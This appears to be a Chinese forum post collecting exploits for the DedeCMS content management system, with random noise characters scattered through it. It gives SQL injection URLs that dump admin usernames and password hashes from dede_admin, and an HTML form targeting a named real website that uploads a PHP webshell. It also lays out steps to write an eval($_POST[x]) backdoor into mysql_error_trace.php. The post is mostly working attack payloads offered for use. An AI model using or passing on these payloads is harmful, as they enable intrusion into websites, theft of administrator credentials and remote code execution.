( x5 Y$ z/ L% m( w: k8 @http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
" a# `$ p+ A& u$ J5 P* O- l* x& \: m* h( I3 l' L, W
  K  M" H2 e  T3 V3 ]

3 f; {$ O* I' p! A3 R7 o8 R' O' g
- }9 t* Y9 s( E" \. Q; F( C7 @  T' v3 l2 T! s& G: J$ [

( {" a! r  Y! _* k: W& p: T' u, e( B  N( h
% ?% z; h" L6 ?$ Q0 q
) Y1 t: V, k6 \% X, Q

$ D% i$ |% P/ z+ Q; _织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
/ ^- @% M$ q) f<html>
% ~- Q0 k: Y2 J( u) b<head>
# q8 S# M3 o1 I<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>& }& M$ J5 Z! d
</head>* `$ f+ B0 O- y* _/ t5 `3 P
<body style="FONT-SIZE: 9pt">9 Y7 [/ Q' R% P3 t6 p/ Q$ X9 q
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
) O4 Z) Q( x4 r5 \( Z6 o% R<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
# ]% H' C! L; [/ l* N# s<input type='hidden' name='activepath' value='/data/cache/' />
! B: |+ \: M3 H' U<input type='hidden' name='cfg_basedir' value='../../' />
9 R3 p7 i: Y, [! \! |<input type='hidden' name='cfg_imgtype' value='php' />
6 W6 E. i2 z0 [<input type='hidden' name='cfg_not_allowall' value='txt' />
4 n0 x+ T- n2 F& K<input type='hidden' name='cfg_softtype' value='php' />
0 ~) }$ C7 v4 f# j7 x<input type='hidden' name='cfg_mediatype' value='php' />' ^$ Z( h- i. G& z$ l( g
<input type='hidden' name='f' value='form1.enclosure' />
' _0 t2 d, C; d$ G1 c<input type='hidden' name='job' value='upload' />
5 f, b/ P  E6 f9 r* q9 E<input type='hidden' name='newname' value='fly.php' />
7 K0 w- J/ W$ z0 V, USelect U Shell <input type='file' name='uploadfile' size='25' />0 S2 v+ w. x. T1 }6 e
<input type='submit' name='sb1' value='确定' />
( x0 B: q/ K0 [5 E) S</form># t; ^# X! f9 p% Q7 h2 C
<br />It's just a exp for the bug of Dedecms V55...<br />
& G# h1 a8 W/ P6 L8 B+ n! J7 wNeed register_globals = on...<br />
- K% T8 ^) n+ X$ l# yFun the game,get a webshell at /data/cache/fly.php...<br />, f: e4 f* {& _1 ^
</body>. l0 X+ \9 Z5 \& b
</html>+ n* N" I1 h  N: ^; j, p) Q
( |' _/ D3 T* s# j0 j
" c' V* h8 {8 ]1 b  @' p

  |# I% v) ?5 s0 _5 u/ |- G2 \" }2 r- E5 w' t+ P' g- }

, z( |8 {: ^1 f9 p5 l0 }1 [  {
) j  ^3 M. }( v4 `4 i. i
* c( v( H1 O1 x

, n! p. Y4 s7 G3 j8 X6 N5 ]
% B, o2 p4 Y% K织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
6 Y/ y# J3 m( t( [4 H利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。) _3 G8 S* z: Z% `/ g
1. 访问网址:
- Q9 A' j2 J, u9 l$ U4 Z; a' I; C
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
" l  j, k, q/ M0 A6 [* I" Z0 e  J2 I可看见错误信息
( _& |" [3 Z3 ^9 n- ]5 E/ @8 f# L) H" p- ~

7 N) v# W4 a0 P0 i2. 访问
http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。: g( \7 N% |* K2 a! u1 J% z
int(3) Error: Illegal double '1024e1024' value found during parsing% _9 E& A3 a5 R6 x( `6 D3 Z- x
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
5 m6 e* @& k7 p7 {9 t& B, B' L5 r7 ~3 v
' o, e- B6 v6 d" g
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
, Z# b) b2 {; ?# M/ Z2 ^% D7 q1 q" s! H9 m  ~' S! e
. |# A+ |$ y0 m! B  s' k7 B1 U7 A
<form action=”
http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>  O( P, H9 L- P* o4 f6 r/ h: G/ ^

' K' u; `' M* x- L' ^( x. o7 k/ Y( F6 a
按确定后的看到第2步骤的信息表示文件木马上传成功.' ]  L, S  }( L9 J( e. p" y# T; ?- r
) J& b* W$ h" u3 j
% p! w$ y0 Z0 w4 i( A! c

/ Y5 w3 n+ M9 n2 i' j4 B
7 E# z# y: u+ b7 d+ X/ ?) s1 z. Y; O' |3 f

/ Y7 x+ d# I% p& D6 D7 {, q5 s+ V7 f8 R; k' R
: v/ ~( X* Y! T: u4 U# o. Q
3 W- U9 n( _8 j& y; Q  Z0 Q8 i& H

& T$ ~' F# m$ m0 [; h
8 }( ~7 r! B. B4 s7 m5 t' ]6 m8 J' m! T# z! W
织梦(DedeCms)plus/infosearch.php 文件注入漏洞9 P+ p# ^4 A; X3 o) M3 l3 T: H
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表